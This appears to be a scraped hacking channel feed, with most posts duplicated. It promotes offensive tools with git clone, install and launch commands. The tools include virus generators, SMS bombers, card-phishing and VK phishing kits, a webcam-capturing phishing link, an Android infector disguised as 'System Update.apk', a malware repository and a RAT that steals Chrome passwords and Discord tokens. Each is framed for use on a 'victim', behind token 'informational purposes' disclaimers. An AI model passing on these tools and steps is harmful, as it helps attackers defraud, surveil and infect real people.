We create a virus for Android/Windows/Linux
Hello everyone.
Well Z Virus is a collection of ready made viruses. This software is capable of generating viruses for all operating systems, and all you need to do is send a link to your victim and force them to download the virus.
Installation:
▪️git clone https://github.com/ZechBron/zVirus-Gen.git
▪️cd zVirus-Gen
chmod +x setup.sh
▪️./setup.sh
Usage:
▪️bash zVirus - program launch
All information is provided for informational purposes only. We are not responsible for your actions.
Hello everyone.
Well Z Virus is a collection of ready made viruses. This software is capable of generating viruses for all operating systems, and all you need to do is send a link to your victim and force them to download the virus.
Installation:
▪️git clone https://github.com/ZechBron/zVirus-Gen.git
▪️cd zVirus-Gen
chmod +x setup.sh
▪️./setup.sh
Usage:
▪️bash zVirus - program launch
All information is provided for informational purposes only. We are not responsible for your actions.
SMS Bomber Collection on GitHub
Hello everyone.
Today I present to your attention a selection of suitable SMS Bobmers.
We study and use.
Selection:
▪️https://github.com/AvinashReddy3108/YetAnotherSMSBomber
▪️https://github.com/TheSpeedX/TBomb
▪️https://github.com/Nikait/ni_bomber
▪️https://github.com/iMro0t/bomb3r
▪️https://github.com/metachar/Tortuga
All information is provided for informational purposes only. We are not responsible for your actions.
Hello everyone.
Today I present to your attention a selection of suitable SMS Bobmers.
We study and use.
Selection:
▪️https://github.com/AvinashReddy3108/YetAnotherSMSBomber
▪️https://github.com/TheSpeedX/TBomb
▪️https://github.com/Nikait/ni_bomber
▪️https://github.com/iMro0t/bomb3r
▪️https://github.com/metachar/Tortuga
All information is provided for informational purposes only. We are not responsible for your actions.
GitHub
GitHub - AvinashReddy3108/YetAnotherSMSBomber: Clean, small and powerful SMS bomber script.
Clean, small and powerful SMS bomber script. Contribute to AvinashReddy3108/YetAnotherSMSBomber development by creating an account on GitHub.
Phishing CC
Hello everyone.
Cardesc is a debit/credit card phishing tool. The principle of operation is simple - with the help of social engineering, we convince the victim to go through the page and enter his card details.
Installation:
▪️apt install python3 git
▪️git clone https://github.com/escdroid/cardesc.git
▪️cd cardesc
▪️chmod +x *
▪️pip3 install -r requirements.txt
Usage:
▪️python3 bank.py - run utility
FOR INFORMATION PURPOSES ONLY!
All information is provided for informational purposes only. We are not responsible for your actions.
Hello everyone.
Cardesc is a debit/credit card phishing tool. The principle of operation is simple - with the help of social engineering, we convince the victim to go through the page and enter his card details.
Installation:
▪️apt install python3 git
▪️git clone https://github.com/escdroid/cardesc.git
▪️cd cardesc
▪️chmod +x *
▪️pip3 install -r requirements.txt
Usage:
▪️python3 bank.py - run utility
FOR INFORMATION PURPOSES ONLY!
All information is provided for informational purposes only. We are not responsible for your actions.
👍1
Encrypting text into an image
ImSter is a utility that allows you to securely hide and view password-encrypted text inside an image. Text is encoded in image pixels, not metadata. It is impossible to determine by eye whether there is hidden content in the image.
Installation
Install the latest release: https://github.com/armytricks/ImSter/releases/tag/v1.1.2
$ chmod +x ImSter-*.jar
Usage
$ java -jar ImSter-xxx.jar encode -i input.png -o output.png -m "message" -p password
You can read more about using the utility on the official GitHub page of the repository.
ImSter is a utility that allows you to securely hide and view password-encrypted text inside an image. Text is encoded in image pixels, not metadata. It is impossible to determine by eye whether there is hidden content in the image.
Installation
Install the latest release: https://github.com/armytricks/ImSter/releases/tag/v1.1.2
$ chmod +x ImSter-*.jar
Usage
$ java -jar ImSter-xxx.jar encode -i input.png -o output.png -m "message" -p password
You can read more about using the utility on the official GitHub page of the repository.
GitHub
Release ImSter v1.1.2 Release · DJayalath/ImSter
Changes
Support for JPEG images as input to encoding operations
Improved clarity of error messages
Support for JPEG images as input to encoding operations
Improved clarity of error messages
❤1
Convenient phishing Vkontakte
Fisher is a weeman script adapted for copying VK pages.
Installation
$ apt update && apt upgrade
$ apt install python2
$ apt install git
$ git clone https://github.com/foxlitegor/fisher
$ cd fisher
$ chmod 777 install.sh
$ sh install.sh
$fish
$ run
Usage
Create a second session in Termux (swipe from left to right) and write:
$ apt install openssh
$ ssh -R 80:localhost:8080 ssh.localhost.ru
After that, we will generate a phishing link, send it to our “victim” and enjoy the result
Fisher is a weeman script adapted for copying VK pages.
Installation
$ apt update && apt upgrade
$ apt install python2
$ apt install git
$ git clone https://github.com/foxlitegor/fisher
$ cd fisher
$ chmod 777 install.sh
$ sh install.sh
$fish
$ run
Usage
Create a second session in Termux (swipe from left to right) and write:
$ apt install openssh
$ ssh -R 80:localhost:8080 ssh.localhost.ru
After that, we will generate a phishing link, send it to our “victim” and enjoy the result
All-in-One Hacking Toolkit
VARIOUS is a universal utility with all kinds of hacking scripts.
Installation
$ git clone https://github.com/Err0r-ICA/VARIOUS.git
$ cd VARIOUS
launch
$ python3 Various
Next, enter the password: ICA
VARIOUS is a universal utility with all kinds of hacking scripts.
Installation
$ git clone https://github.com/Err0r-ICA/VARIOUS.git
$ cd VARIOUS
launch
$ python3 Various
Next, enter the password: ICA
GitHub
GitHub - Err0r-ICA/VARIOUS: Most Complete Hacking Toolkit
Most Complete Hacking Toolkit. Contribute to Err0r-ICA/VARIOUS development by creating an account on GitHub.
New tool for OSINT in Telegram
Telepathy is a tool for collecting information from Telegram chats. At the moment, the utility is able to work only with the source of forwarded messages, the functionality will expand over time.
Installation
$ git clone https://github.com/jordanwildon/Telepathy.git
$ pip install -r requirements.txt
$ run setup.py
launch
$ cd Telepathy
$ python3 setup.py
After that, we launch telepathy.py and add the authorization code from Telegram on the first use. You can learn more about the tool on Github
Telepathy is a tool for collecting information from Telegram chats. At the moment, the utility is able to work only with the source of forwarded messages, the functionality will expand over time.
Installation
$ git clone https://github.com/jordanwildon/Telepathy.git
$ pip install -r requirements.txt
$ run setup.py
launch
$ cd Telepathy
$ python3 setup.py
After that, we launch telepathy.py and add the authorization code from Telegram on the first use. You can learn more about the tool on Github
GitHub
GitHub - prose-intelligence-ltd/Telepathy-Community: Public release of Telepathy, an OSINT toolkit for investigating Telegram chats.
Public release of Telepathy, an OSINT toolkit for investigating Telegram chats. - prose-intelligence-ltd/Telepathy-Community
Hacking a webcam using a phishing attack
CAM DUMPER is a utility that takes a picture from the victim's webcam when clicking on a malicious link.
We have already published several similar tools, however, CAM DUMPER has a number of advantages - the malicious page has the HTTPS protocol, and there is also the ability to record video and sound.
Installation
$ apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh
The developer also recommends installing Material Files, for easy management of captured targets.
Strictly for informational purposes
CAM DUMPER is a utility that takes a picture from the victim's webcam when clicking on a malicious link.
We have already published several similar tools, however, CAM DUMPER has a number of advantages - the malicious page has the HTTPS protocol, and there is also the ability to record video and sound.
Installation
$ apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh
The developer also recommends installing Material Files, for easy management of captured targets.
Strictly for informational purposes
GitHub
GitHub - LiNuX-Mallu/CAM-DUMPER: Take webcam shots from target by just sending a malicious link
Take webcam shots from target by just sending a malicious link - LiNuX-Mallu/CAM-DUMPER
How to infect any Android device?
Good day! The infection process is carried out using a link. So, the hacker creates a link, after which he throws it to his victim, when the victim clicks on the link, the System Update.apk file is downloaded to her device. As soon as this software is installed, the Android of the victim will begin to be destroyed.
Let's go!
1. For installation is used:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ git clone https://github.com/noob-hackers/infect
2. The launch is carried out using the following commands:
$ cd $HOME
$ cd infection
$bash infect.sh
Good day! The infection process is carried out using a link. So, the hacker creates a link, after which he throws it to his victim, when the victim clicks on the link, the System Update.apk file is downloaded to her device. As soon as this software is installed, the Android of the victim will begin to be destroyed.
Let's go!
1. For installation is used:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ git clone https://github.com/noob-hackers/infect
2. The launch is carried out using the following commands:
$ cd $HOME
$ cd infection
$bash infect.sh
GitHub
GitHub - noob-hackers/infect: Infect Any Android Device With Virus From Link In Termux
Infect Any Android Device With Virus From Link In Termux - noob-hackers/infect
Powerful phishing tool
SuperLink allows you to create a phishing site using a PHP server and Ngrok and generate a link to it. When the victim opens the link, they will be prompted to give some permissions. If the victim clicks on the "allow" button, then we will get his data up to the location.
Installation
$ git clone https://github.com/IHosseini083/SuperLink.git
$cd SuperLink
$ bash linux_installer.sh
Usage
$ python3 SuperLink.py -p (port)
SuperLink allows you to create a phishing site using a PHP server and Ngrok and generate a link to it. When the victim opens the link, they will be prompted to give some permissions. If the victim clicks on the "allow" button, then we will get his data up to the location.
Installation
$ git clone https://github.com/IHosseini083/SuperLink.git
$cd SuperLink
$ bash linux_installer.sh
Usage
$ python3 SuperLink.py -p (port)
GitHub
GitHub - IHosseini083/SuperLink: Social engineering tool for multiple purposes such as locating target's location, webcam access…
Social engineering tool for multiple purposes such as locating target's location, webcam access, OS Password grabber... - IHosseini083/SuperLink
Deanonym of a person from a photo
EagleEye is a utility that allows you to find people's social profiles. networks by their photo and supposed name.
Installation:
▪️git clone https://github.com/ThoughtfulDev/EagleEye
▪️cd EagleEye && sudo pip3 install -r requirements.txt
▪️sudo pip3 install --upgrade beautifulsoup4 html5lib spry
Launch:
▪️python3 eagle-eye.py
EagleEye is a utility that allows you to find people's social profiles. networks by their photo and supposed name.
Installation:
▪️git clone https://github.com/ThoughtfulDev/EagleEye
▪️cd EagleEye && sudo pip3 install -r requirements.txt
▪️sudo pip3 install --upgrade beautifulsoup4 html5lib spry
Launch:
▪️python3 eagle-eye.py
GitHub
GitHub - ThoughtfulDev/EagleEye: Stalk your Friends. Find their Instagram, FB and Twitter Profiles using Image Recognition and…
Stalk your Friends. Find their Instagram, FB and Twitter Profiles using Image Recognition and Reverse Image Search. - ThoughtfulDev/EagleEye
Repository with modern malware
Viridae is a collection of viruses for both PC and phone.
Installation
$ pkg update -y;pkg upgrade -y
$ git clone https://github.com/Err0r-ICA/Viridae
$cd Viridae
$ pip2 install -r requirements.txt
$ python2 Viridae
Strictly for informational purposes ✌️
Viridae is a collection of viruses for both PC and phone.
Installation
$ pkg update -y;pkg upgrade -y
$ git clone https://github.com/Err0r-ICA/Viridae
$cd Viridae
$ pip2 install -r requirements.txt
$ python2 Viridae
Strictly for informational purposes ✌️
GitHub
GitHub - Err0r-ICA/Viridae: Virus - Trojans - Worms - Malwares
Virus - Trojans - Worms - Malwares. Contribute to Err0r-ICA/Viridae development by creating an account on GitHub.
Hacking a webcam using a phishing attack
CAM DUMPER is a utility that takes a picture from the victim's webcam when clicking on a malicious link.
We have already published several similar tools, however, CAM DUMPER has a number of advantages - the malicious page has the HTTPS protocol, and there is also the ability to record video and sound.
Installation
$ apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh
The developer also recommends installing Material Files, for easy management of captured targets.
Strictly for informational purposes ✌️
CAM DUMPER is a utility that takes a picture from the victim's webcam when clicking on a malicious link.
We have already published several similar tools, however, CAM DUMPER has a number of advantages - the malicious page has the HTTPS protocol, and there is also the ability to record video and sound.
Installation
$ apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh
The developer also recommends installing Material Files, for easy management of captured targets.
Strictly for informational purposes ✌️
GitHub
GitHub - LiNuX-Mallu/CAM-DUMPER: Take webcam shots from target by just sending a malicious link
Take webcam shots from target by just sending a malicious link - LiNuX-Mallu/CAM-DUMPER
❤1
Sending anonymous SMS in Termux
Sms-scammer is a simple script that uses the requests module and a post request to send an anonymous message from a website.
Installation
$ git clone https://github.com/Sanif007/sms-scammer
$ pip install request
$ cd sms-scammer
launch
$ python sms.py
Sms-scammer is a simple script that uses the requests module and a post request to send an anonymous message from a website.
Installation
$ git clone https://github.com/Sanif007/sms-scammer
$ pip install request
$ cd sms-scammer
launch
$ python sms.py
GitHub
GitHub - Sanif007/sms-scammer: this tool is not for any revenge purpose. please use it only for fun! use wisely!
this tool is not for any revenge purpose. please use it only for fun! use wisely! - Sanif007/sms-scammer
All-in-One Hacking Toolkit
Hello everyone.
VARIOUS is a universal utility with all kinds of hacking scripts.
Installation:
▪️git clone https://github.com/Err0r-ICA/VARIOUS.git
▪️cd VARIOUS
Usage:
▪️python3 Various - run utility
Next, enter the password: ICA
All information is provided for informational purposes only. We are not responsible for your actions.
Hello everyone.
VARIOUS is a universal utility with all kinds of hacking scripts.
Installation:
▪️git clone https://github.com/Err0r-ICA/VARIOUS.git
▪️cd VARIOUS
Usage:
▪️python3 Various - run utility
Next, enter the password: ICA
All information is provided for informational purposes only. We are not responsible for your actions.
GitHub
GitHub - Err0r-ICA/VARIOUS: Most Complete Hacking Toolkit
Most Complete Hacking Toolkit. Contribute to Err0r-ICA/VARIOUS development by creating an account on GitHub.
Repository with modern malware
Viridae is a collection of viruses for both PC and phone.
Installation
$ pkg update -y;pkg upgrade -y
$ git clone https://github.com/Err0r-ICA/Viridae
$cd Viridae
$ pip2 install -r requirements.txt
$ python2 Viridae
Viridae is a collection of viruses for both PC and phone.
Installation
$ pkg update -y;pkg upgrade -y
$ git clone https://github.com/Err0r-ICA/Viridae
$cd Viridae
$ pip2 install -r requirements.txt
$ python2 Viridae
GitHub
GitHub - Err0r-ICA/Viridae: Virus - Trojans - Worms - Malwares
Virus - Trojans - Worms - Malwares. Contribute to Err0r-ICA/Viridae development by creating an account on GitHub.
My rat tool
https://github.com/youhacker55/jarbou3
Jarbou3 is rat tool coded in python with C&C which can accept multiple connections from clients
Features
C&C server which can accept multiple clients
builder
Undetectable
Steal chrome passwords
Steal Discord Token
Persistence
download + upload files
run powershell commands
spawn other programmes
screenshot
Keylooger
send commands to all clients
download file and exec
https://github.com/youhacker55/jarbou3
Jarbou3 is rat tool coded in python with C&C which can accept multiple connections from clients
Features
C&C server which can accept multiple clients
builder
Undetectable
Steal chrome passwords
Steal Discord Token
Persistence
download + upload files
run powershell commands
spawn other programmes
screenshot
Keylooger
send commands to all clients
download file and exec
GitHub
GitHub - TheNewAttacker64/jarbou3: Jarbou3 is rat tool coded in python with C&C which can accept multiple connections from clients
Jarbou3 is rat tool coded in python with C&C which can accept multiple connections from clients - TheNewAttacker64/jarbou3
❤1
firefox_decrypt.py
36.7 KB
Download this tool and run it by :
python3 firefox_decrypt.py
Source code : https://github.com/Unode/firefox_decrypt/blob/master/firefox_decrypt.pyA powerful tool for punching a user by nickname
Snoop is one of the best tools for searching and processing public data on the Internet.
In terms of specialized search, Snoop is able to compete with traditional search engines.
Installation
$ pkg update
$ pkg upgrade
$ apt install git python
$ git clone https://github.com/snooppr/snoop.git
$ cd snoop
$ python3 -m pip install -r requirements.txt
launch
$ python3 snoop.py victim nickname
Snoop is one of the best tools for searching and processing public data on the Internet.
In terms of specialized search, Snoop is able to compete with traditional search engines.
Installation
$ pkg update
$ pkg upgrade
$ apt install git python
$ git clone https://github.com/snooppr/snoop.git
$ cd snoop
$ python3 -m pip install -r requirements.txt
launch
$ python3 snoop.py victim nickname
GitHub
GitHub - snooppr/snoop: Snoop — инструмент разведки на основе открытых данных (OSINT world)
Snoop — инструмент разведки на основе открытых данных (OSINT world) - snooppr/snoop
Universal Phishing Tool!
Phishbait is a working utility for creating phishing pages of 38 popular resources. There is even apple id & Yandex. In short - a must-have for creating phishing.
Installation:
▪️apt install git
▪️git clone https://github.com/Err0r-ICA/Phishbait.git
▪️cd Phishbait
Usage:
▪️bash Phishbait - launch utility
Phishbait is a working utility for creating phishing pages of 38 popular resources. There is even apple id & Yandex. In short - a must-have for creating phishing.
Installation:
▪️apt install git
▪️git clone https://github.com/Err0r-ICA/Phishbait.git
▪️cd Phishbait
Usage:
▪️bash Phishbait - launch utility
GitHub
GitHub - Err0r-ICA/Phishbait: 100% working Phishing Tool (38 websites)
100% working Phishing Tool (38 websites) . Contribute to Err0r-ICA/Phishbait development by creating an account on GitHub.